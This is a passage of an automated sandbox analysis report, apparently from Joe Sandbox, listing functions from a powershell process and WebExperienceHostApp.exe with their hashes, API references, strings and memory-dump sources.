Instruction Fuzzy Hash: 34A18034B012189FCB15DFA8D8849AEBBF6FF89310B1485A9E445AB362CB35ED45CF50

Function 04038478 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2007363144.0000000004030000.00000040.00000800.00020000.00000000.sdmp, Offset: 04030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4030000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d488e37f92c6ddd7c4df08335cba71bffcbd96e4ce9af0c4c3b245d641bfba
Instruction ID: 5e73470a2faa145e7b438b035d81daa424202f1e70773acc1aa6538b804dca3f
Opcode Fuzzy Hash: b6d488e37f92c6ddd7c4df08335cba71bffcbd96e4ce9af0c4c3b245d641bfba
Instruction Fuzzy Hash: 71A18136A00208DFDB14EFA5C944AADBBF6FF84341F118559E806AB365DB74ED49CB80

Function 04038BC8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2007363144.0000000004030000.00000040.00000800.00020000.00000000.sdmp, Offset: 04030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4030000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbe6e9f6d43742ded82509ce637f2ec12b379786792fab84cb7f3a7539235fa0
Instruction ID: b76e4a789ef2b91bf5e47e676d0522bd0297b10a437ded71c2cca70d6d9427d7
Opcode Fuzzy Hash: fbe6e9f6d43742ded82509ce637f2ec12b379786792fab84cb7f3a7539235fa0
Instruction Fuzzy Hash: 3C71D031A002098FDB14DF68C884A9EFFFAFF85314F148569E415EB661DB75AC46CB80

Function 04038D36 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2007363144.0000000004030000.00000040.00000800.00020000.00000000.sdmp, Offset: 04030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4030000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 410780225fa63430d4420c586f2ddd3dbbed4368827fbd8ae23116c48987ebc3
Instruction ID: 8c4afae6794d7daae94c64e3b6f17d71fa73cc3e05ea831bc8b906f3cc1b06f5
Opcode Fuzzy Hash: 410780225fa63430d4420c586f2ddd3dbbed4368827fbd8ae23116c48987ebc3
Instruction Fuzzy Hash: 6C718E31E00208DFDB14EFB4D844BADBBF6BF88345F148469E416AB261DB74AD46CB41

Function 04038959 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2007363144.0000000004030000.00000040.00000800.00020000.00000000.sdmp, Offset: 04030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4030000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ed09a124f440c6b3408f3d4f32556a2ba954819a2cf3542f45fd296301f34c1
Instruction ID: 93a3ea048278a4d4444220dff51d414c5f02a0da97303d3ec5fa09fc16e8a4f7
Opcode Fuzzy Hash: 2ed09a124f440c6b3408f3d4f32556a2ba954819a2cf3542f45fd296301f34c1
Instruction Fuzzy Hash: A551B5316006058FEB14EB74C958AAD7BF6EF89751F1465A9E402EB3A1DF34AC81CB50

Function 04038BB3 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2007363144.0000000004030000.00000040.00000800.00020000.00000000.sdmp, Offset: 04030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4030000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1823ac4da974e07ca1f40701a1eb96e5d0277393c3a0357388ff95912e51a8c
Instruction ID: ca386ca3bf40856a31d0344dc719a476870d9d664ca966d369b859c3c193bfed
Opcode Fuzzy Hash: b1823ac4da974e07ca1f40701a1eb96e5d0277393c3a0357388ff95912e51a8c
Instruction Fuzzy Hash: E3419F70A006098FDB24EFA9C8587ADFFF6FF84340F148469E406AB765DB74A845CB40

Function 005FD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2007150648.00000000005FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 005FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5fd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fd31e7c04113b92a5c0e4b2372f5fdd742a46c549d901152a11dc4b5c25d3d1
Instruction ID: a9de2d121ca80f15bd0ade213f459b1eb945f688fea6f9cc7689eb8d5a57410a
Opcode Fuzzy Hash: 9fd31e7c04113b92a5c0e4b2372f5fdd742a46c549d901152a11dc4b5c25d3d1
Instruction Fuzzy Hash: 66012B31008308AAE7108E26CDC8B77BFACFF45324F18C92AEE084B146DA7DD845C6B1

Function 005FD006 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2007150648.00000000005FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 005FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5fd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 940cf05beb7d54aab3d962b6990fe02bb8b317a1c6b84a7d5bc9e282fe82bd72
Instruction ID: 862099b99ad1f0f0c34803ebac9db2e92aeb9118ebdc13c8a74cb193b2888b08
Opcode Fuzzy Hash: 940cf05beb7d54aab3d962b6990fe02bb8b317a1c6b84a7d5bc9e282fe82bd72
Instruction Fuzzy Hash: 1E01527100E3C45ED7124B258C98B66BFB8EF53224F1DC4DBD9888F1A7D2695849C772

Function 040388ED Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2007363144.0000000004030000.00000040.00000800.00020000.00000000.sdmp, Offset: 04030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4030000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 842d518c6a6a79d2fe249f4fb009685cc6aade7ea29b549ab62c4302c2404cda
Instruction ID: bda22ae8bf95cf661a8f8113ead3261a8f5a5cc1a3cea544d751970bba5db5fc
Opcode Fuzzy Hash: 842d518c6a6a79d2fe249f4fb009685cc6aade7ea29b549ab62c4302c2404cda
Instruction Fuzzy Hash: A6F03730640206CFDB04EBA4C555B6E7BB2EF41344F109555E1029F368DB789D888BC0

Function 0403B2C5 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2007363144.0000000004030000.00000040.00000800.00020000.00000000.sdmp, Offset: 04030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4030000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82ded526f673c460c61a392ac564dc6a936d13aecf36ce18cdb9a4c72ec0db87
Instruction ID: ced8514273737eefdff8e9a8f8f809abd6fad5d84c942788133cef59eead6821
Opcode Fuzzy Hash: 82ded526f673c460c61a392ac564dc6a936d13aecf36ce18cdb9a4c72ec0db87
Instruction Fuzzy Hash: C2E0EDB5D1430A9FCB48DFA994011AEBBF5AF48301F10856ED859F3300E63456418FD5

Function 0403B2D0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2007363144.0000000004030000.00000040.00000800.00020000.00000000.sdmp, Offset: 04030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4030000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34aff54fc6c422a017cfcc1963ad76f03b8bcd3fe6d95126884d6b5f2405c526
Instruction ID: da392a5fa20c5c1873125a37449a896ebdb431f202402f4931770f382ab55f79
Opcode Fuzzy Hash: 34aff54fc6c422a017cfcc1963ad76f03b8bcd3fe6d95126884d6b5f2405c526
Instruction Fuzzy Hash: 69E026B4E0420E9F8F48DFB995421BEFFF5AB48205F10856E9819E3340E63456518FD5

Function 0403B291 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2007363144.0000000004030000.00000040.00000800.00020000.00000000.sdmp, Offset: 04030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4030000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1dd2887aea9449bbb5e27dc499a79e1f540c2c7f5212813eced533378bd6619
Instruction ID: d1dc9bfeb74462a96620293202338460d5a7af69f0d2c91f5443eac384dde71a
Opcode Fuzzy Hash: a1dd2887aea9449bbb5e27dc499a79e1f540c2c7f5212813eced533378bd6619
Instruction Fuzzy Hash: 38D05E3101D394DBC3139BA078182DD7FB99F03206B151583E1458A15786517440D7A2

Non-executed Functions

Function 04032015 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2007363144.0000000004030000.00000040.00000800.00020000.00000000.sdmp, Offset: 04030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4030000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9243588292ca17edb79dd6a87ad0e05706998aefd2b24c7a20d7f5c8d7f6b7ab
Instruction ID: 96236fddabac89c1de4a2fa09ad509fe508e562a4b2c9bc4a36191abafa8aa19
Opcode Fuzzy Hash: 9243588292ca17edb79dd6a87ad0e05706998aefd2b24c7a20d7f5c8d7f6b7ab
Instruction Fuzzy Hash: F131C34201E7D60FC31BA67869A20C5BF34AD430A878E83D7C4D1CF5E3EA49495BC3A2

Function 06C50898 Relevance: 10.2, Strings: 8, Instructions: 178COMMON

Download Yara Rule

Strings

$^q, xrefs: 06C50A56
$^q, xrefs: 06C5091D
$^q, xrefs: 06C508EF
$^q, xrefs: 06C50A62
4'^q, xrefs: 06C50947
4'^q, xrefs: 06C50953
$^q, xrefs: 06C50A3E
$^q, xrefs: 06C50929

Memory Dump Source

Source File: 00000003.00000002.2012825317.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c50000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3732357466
Opcode ID: 26e8393c9e095f6300adb53dadadf1949615c681e0c749710f4f442b0de6e3e9
Instruction ID: e328640a4e96f35f0055208326bc53dcda6fa110044f84162c581dd904b213b0
Opcode Fuzzy Hash: 26e8393c9e095f6300adb53dadadf1949615c681e0c749710f4f442b0de6e3e9
Instruction Fuzzy Hash: EB512735F04309CFEB654A2A9C0066BBBB6AFC5320B25846FDC45CB256DA32C9C5C7A5

Function 06C504D0 Relevance: 5.0, Strings: 4, Instructions: 48COMMON

Download Yara Rule

Strings

$^q, xrefs: 06C50526
4'^q, xrefs: 06C50547
4'^q, xrefs: 06C5053B
$^q, xrefs: 06C5051A

Memory Dump Source

Source File: 00000003.00000002.2012825317.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c50000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q
API String ID: 0-2049395529
Opcode ID: 1772b86fb0a25ab6f726100e541d1cfae647cf6397bd06b8d729a5bd23140194
Instruction ID: fc9cd8eff5adfce7f5de53f7ff1e8d92d5d761b72e6195c0b4994b6655918492
Opcode Fuzzy Hash: 1772b86fb0a25ab6f726100e541d1cfae647cf6397bd06b8d729a5bd23140194
Instruction Fuzzy Hash: 52012B20B0D3984FC77A06281C245523FB65FC260079B409FD441DF39BCC594D8AC3AB

Analysis Process: WebExperienceHostApp.exePID: 7204, Parent PID: 7712COMMON

Execution Graph

Execution Coverage:	1.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.6%
Total number of Nodes:	345
Total number of Limit Nodes:	8

Executed Functions

Function 00007FF619492AA0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 192
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-1 ref: 00007FF619492B06
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF619492B15
LoadLibraryW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-1 ref: 00007FF619492B4E
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF619492B5D

Strings

combase.dll, xrefs: 00007FF619492AFF, 00007FF619492B47
DllGetActivationFactory, xrefs: 00007FF619492CC3
CoIncrementMTAUsage, xrefs: 00007FF619492B56
RoGetActivationFactory, xrefs: 00007FF619492B0E

Memory Dump Source

Source File: 00000008.00000002.2073734215.00007FF619491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF619490000, based on PE: true

Associated: 00000008.00000002.2073718084.00007FF619490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073752558.00007FF61949A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073773372.00007FF61949E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073792932.00007FF61949F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff619490000_WebExperienceHostApp.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: CoIncrementMTAUsage$DllGetActivationFactory$RoGetActivationFactory$combase.dll
API String ID: 2574300362-4036682018
Opcode ID: 47d738070b0af0edd47e385eed6e46aaa3c203f272d590f42774a49a749df1a6
Instruction ID: 8729c2a14b9e4dd5ca1b6ac8d4c058a39296da439ca53dcb4318a0223dea0a5c
Opcode Fuzzy Hash: 47d738070b0af0edd47e385eed6e46aaa3c203f272d590f42774a49a749df1a6
Instruction Fuzzy Hash: 16811A66B18E0298FB10DF61DA511BD27A0BF4CFACF544136DE1E966A9DE3CE465C300

Function 00007FF6194954F4 Relevance: 24.1, APIs: 15, Strings: 1, Instructions: 138
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_CxxThrowException.VCRUNTIME140_APP ref: 00007FF619495554
_CxxThrowException.VCRUNTIME140_APP ref: 00007FF619495578
_CxxThrowException.VCRUNTIME140_APP ref: 00007FF61949559C
_CxxThrowException.VCRUNTIME140_APP ref: 00007FF6194955C0
_CxxThrowException.VCRUNTIME140_APP ref: 00007FF6194955E4
_CxxThrowException.VCRUNTIME140_APP ref: 00007FF619495608
_CxxThrowException.VCRUNTIME140_APP ref: 00007FF61949562C
_CxxThrowException.VCRUNTIME140_APP ref: 00007FF619495650
_CxxThrowException.VCRUNTIME140_APP ref: 00007FF619495674
_CxxThrowException.VCRUNTIME140_APP ref: 00007FF619495698
_CxxThrowException.VCRUNTIME140_APP ref: 00007FF6194956BC
_CxxThrowException.VCRUNTIME140_APP ref: 00007FF6194956E0
_CxxThrowException.VCRUNTIME140_APP ref: 00007FF619495704
_CxxThrowException.VCRUNTIME140_APP ref: 00007FF619495728
_CxxThrowException.VCRUNTIME140_APP ref: 00007FF619495740

Part of subcall function 00007FF61949301C: GetErrorInfo.OLEAUT32(?,?,?,?,?,?,?,?,?,00007FF619495735), ref: 00007FF61949306B
Part of subcall function 00007FF61949301C: SysFreeString.OLEAUT32 ref: 00007FF6194930FA

Strings

bad allocation, xrefs: 00007FF619495533

Memory Dump Source

Source File: 00000008.00000002.2073734215.00007FF619491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF619490000, based on PE: true

Associated: 00000008.00000002.2073718084.00007FF619490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073752558.00007FF61949A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073773372.00007FF61949E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073792932.00007FF61949F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff619490000_WebExperienceHostApp.jbxd

Similarity

API ID: ExceptionThrow$ErrorFreeInfoString
String ID: bad allocation
API String ID: 1975901121-2104205924
Opcode ID: 0933e274a7c38970862a05a2fb4c41735afd250a0c49872c24e88f4e3a59b920
Instruction ID: 3776d19086439adb33cbdb6d9fd1c4bf06da4139404075e68e24e26e4dcf781c
Opcode Fuzzy Hash: 0933e274a7c38970862a05a2fb4c41735afd250a0c49872c24e88f4e3a59b920
Instruction Fuzzy Hash: 56611E21E19D0796FE04EF60EA815B92361BF9CB3CFA05535D50C864AAEE6CED65C380

Function 00007FF619495D10 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 289
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslwr_s.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF61949601B

Part of subcall function 00007FF6194954F4: _CxxThrowException.VCRUNTIME140_APP ref: 00007FF619495554
Part of subcall function 00007FF6194954F4: _CxxThrowException.VCRUNTIME140_APP ref: 00007FF619495578
Part of subcall function 00007FF6194954F4: _CxxThrowException.VCRUNTIME140_APP ref: 00007FF61949559C
Part of subcall function 00007FF6194954F4: _CxxThrowException.VCRUNTIME140_APP ref: 00007FF6194955C0
Part of subcall function 00007FF6194954F4: _CxxThrowException.VCRUNTIME140_APP ref: 00007FF6194955E4
Part of subcall function 00007FF6194954F4: _CxxThrowException.VCRUNTIME140_APP ref: 00007FF619495608
Part of subcall function 00007FF6194954F4: _CxxThrowException.VCRUNTIME140_APP ref: 00007FF61949562C
Part of subcall function 00007FF6194954F4: _CxxThrowException.VCRUNTIME140_APP ref: 00007FF619495650
Part of subcall function 00007FF6194954F4: _CxxThrowException.VCRUNTIME140_APP ref: 00007FF619495674
Part of subcall function 00007FF6194954F4: _CxxThrowException.VCRUNTIME140_APP ref: 00007FF619495698

Part of subcall function 00007FF619494FF8: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6194931F2,?,?,?,?,?,?,?,?,?,00007FF619495735), ref: 00007FF61949501A
Part of subcall function 00007FF619494FF8: HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6194931F2,?,?,?,?,?,?,?,?,?,00007FF619495735), ref: 00007FF619495027

LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF619496151
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF619496166
RoInitialize.API-MS-WIN-CORE-WINRT-L1-1-0 ref: 00007FF619496179

Strings

getstarted, xrefs: 00007FF619495D43
WebExperienceHost.dll, xrefs: 00007FF61949614A
StartApplication, xrefs: 00007FF61949615C
ms-cxh://getstarted/?surface=start, xrefs: 00007FF619495D31

Memory Dump Source

Source File: 00000008.00000002.2073734215.00007FF619491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF619490000, based on PE: true

Associated: 00000008.00000002.2073718084.00007FF619490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073752558.00007FF61949A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073773372.00007FF61949E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073792932.00007FF61949F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff619490000_WebExperienceHostApp.jbxd

Similarity

API ID: ExceptionThrow$Heap$AddressFreeInitializeLibraryLoadProcProcess_wcslwr_s
String ID: StartApplication$WebExperienceHost.dll$getstarted$ms-cxh://getstarted/?surface=start
API String ID: 708943818-2938634902
Opcode ID: e8c37fcd8af3848a00225ce46d0b1f18bbe59973078c324ef50a8d7345a33e00
Instruction ID: bdce151df167ad169eb1b33f2f12fe4f005fc4e82c80731033b897d5806537c0
Opcode Fuzzy Hash: e8c37fcd8af3848a00225ce46d0b1f18bbe59973078c324ef50a8d7345a33e00
Instruction Fuzzy Hash: 31D1642261CE8292EE20DF15E5513BE6361FFD9BA8F501131E68DC26E9DF2CE514C740

Function 00007FF61949158C Relevance: 10.6, APIs: 7, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_initialize_crt.LIBCMT ref: 00007FF61949159B
__scrt_acquire_startup_lock.LIBCMT ref: 00007FF6194915B0
__scrt_release_startup_lock.LIBCMT ref: 00007FF61949161E
_register_thread_local_exe_atexit_callback.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF61949166C
_get_wide_winmain_command_line.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF619491679
_cexit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6194916A2
_exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6194916F7

Memory Dump Source

Source File: 00000008.00000002.2073734215.00007FF619491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF619490000, based on PE: true

Associated: 00000008.00000002.2073718084.00007FF619490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073752558.00007FF61949A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073773372.00007FF61949E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073792932.00007FF61949F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff619490000_WebExperienceHostApp.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_initialize_crt__scrt_release_startup_lock_cexit_exit_get_wide_winmain_command_line_register_thread_local_exe_atexit_callback
String ID:
API String ID: 3863933208-0
Opcode ID: 334a747d7520e6ee41ddac6c63d8f888343b0ad2c4d77d698ff4bb8d04e6e29e
Instruction ID: 55fad627b07d9280abad0e499e7e6ac273ee1bf41bac19745a3ce074ea0f636a
Opcode Fuzzy Hash: 334a747d7520e6ee41ddac6c63d8f888343b0ad2c4d77d698ff4bb8d04e6e29e
Instruction Fuzzy Hash: C7314D20E0C94386FA24AF6497553B91291BF8DF6CF48453DD90EC76E3DE2CA824C301

Function 00007FFE007A8370 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::ios_base::failure::failure.LIBCPMT ref: 00007FFE007A8413
_CxxThrowException.VCRUNTIME140_APP ref: 00007FFE007A8424

Strings

ios_base::failbit set, xrefs: 00007FFE007A83E7
ios_base::eofbit set, xrefs: 00007FFE007A83EE
ios_base::badbit set, xrefs: 00007FFE007A83DC

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: ExceptionThrowstd::ios_base::failure::failure
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2003779279-1866435925
Opcode ID: 18c4eb03d72117c3613aa7784f1bf35228662092d537acc2669780a054874281
Instruction ID: 419d390ff1474c8399274fb9c28f214274a2cb14834313171ed7116676e2c880
Opcode Fuzzy Hash: 18c4eb03d72117c3613aa7784f1bf35228662092d537acc2669780a054874281
Instruction Fuzzy Hash: 1421B062A0E68692EE94AB14E5413BD3360FF96B84F884031E74D47BB9DF3CE5A5C301

Function 00007FF6194927BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF619493238: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF6194926C9), ref: 00007FF619493252

InterlockedPushEntrySList.API-MS-WIN-CORE-INTERLOCKED-L1-1-0 ref: 00007FF61949288D

Strings

Windows.ApplicationModel.AppInstance, xrefs: 00007FF6194927E9
$, xrefs: 00007FF6194927F4

Memory Dump Source

Source File: 00000008.00000002.2073734215.00007FF619491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF619490000, based on PE: true

Associated: 00000008.00000002.2073718084.00007FF619490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073752558.00007FF61949A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073773372.00007FF61949E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073792932.00007FF61949F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff619490000_WebExperienceHostApp.jbxd

Similarity

API ID: EntryInterlockedListPushabort
String ID: $$Windows.ApplicationModel.AppInstance
API String ID: 1923770069-1542873791
Opcode ID: 4ddd20ba726a00b9b6211fbdb94cfa68b2457837ad145f8ff0950f50f8d1477a
Instruction ID: f381fc600bc8922435e8d8de9aa378e8094e23fc3066f531bddcf23e3f9bd65b
Opcode Fuzzy Hash: 4ddd20ba726a00b9b6211fbdb94cfa68b2457837ad145f8ff0950f50f8d1477a
Instruction Fuzzy Hash: A731D526B05E06A8FB10DF61D9513AD2374BB48BACF844536DE0D96A68DF38E569C380

Function 00007FFE1A456430 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlPcToFileHeader.API-MS-WIN-CORE-RTLSUPPORT-L1-1-0 ref: 00007FFE1A456474
RaiseException.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFE1A4564BA

Strings

csm, xrefs: 00007FFE1A4564A7

Memory Dump Source

Source File: 00000008.00000002.2073941607.00007FFE1A451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000008.00000002.2073926171.00007FFE1A450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074005137.00007FFE1A461000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074022650.00007FFE1A466000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074040802.00007FFE1A467000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe1a450000_WebExperienceHostApp.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 3a8fa3ff98e3fc415a503cae1c61ec6dd809c1b335de595b54931dad9c86390a
Instruction ID: 2351fcda031a166075cd1696c76bc4f22ddbb97be450fa565f2ab2c1d05bb4e0
Opcode Fuzzy Hash: 3a8fa3ff98e3fc415a503cae1c61ec6dd809c1b335de595b54931dad9c86390a
Instruction Fuzzy Hash: 30113D32608B8182EB118F16F440269B7A5FB89F94F2842B1DE8C07B68EF3CD561CB00

Function 00007FF61949301C Relevance: 4.6, APIs: 3, Instructions: 149
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetErrorInfo.OLEAUT32(?,?,?,?,?,?,?,?,?,00007FF619495735), ref: 00007FF61949306B
SysFreeString.OLEAUT32 ref: 00007FF6194930FA
SysFreeString.OLEAUT32 ref: 00007FF6194931FB

Part of subcall function 00007FF619495748: iswspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,00007FF6194931AE,?,?,?,?,?,?,?,?,?,00007FF619495735), ref: 00007FF619495775

Part of subcall function 00007FF619494FF8: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6194931F2,?,?,?,?,?,?,?,?,?,00007FF619495735), ref: 00007FF61949501A
Part of subcall function 00007FF619494FF8: HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6194931F2,?,?,?,?,?,?,?,?,?,00007FF619495735), ref: 00007FF619495027

Memory Dump Source

Source File: 00000008.00000002.2073734215.00007FF619491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF619490000, based on PE: true

Associated: 00000008.00000002.2073718084.00007FF619490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073752558.00007FF61949A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073773372.00007FF61949E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073792932.00007FF61949F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff619490000_WebExperienceHostApp.jbxd

Similarity

API ID: Free$HeapString$ErrorInfoProcessiswspace
String ID:
API String ID: 1871405674-0
Opcode ID: af1a7296eed4c721050ecdce830b80138dec2ab0313aaa0980fcd02fb34735b4
Instruction ID: 1fcd9d4a324674f3c80f476c5b15f593acfbf9cc361755a6160bb4ccf473a38a
Opcode Fuzzy Hash: af1a7296eed4c721050ecdce830b80138dec2ab0313aaa0980fcd02fb34735b4
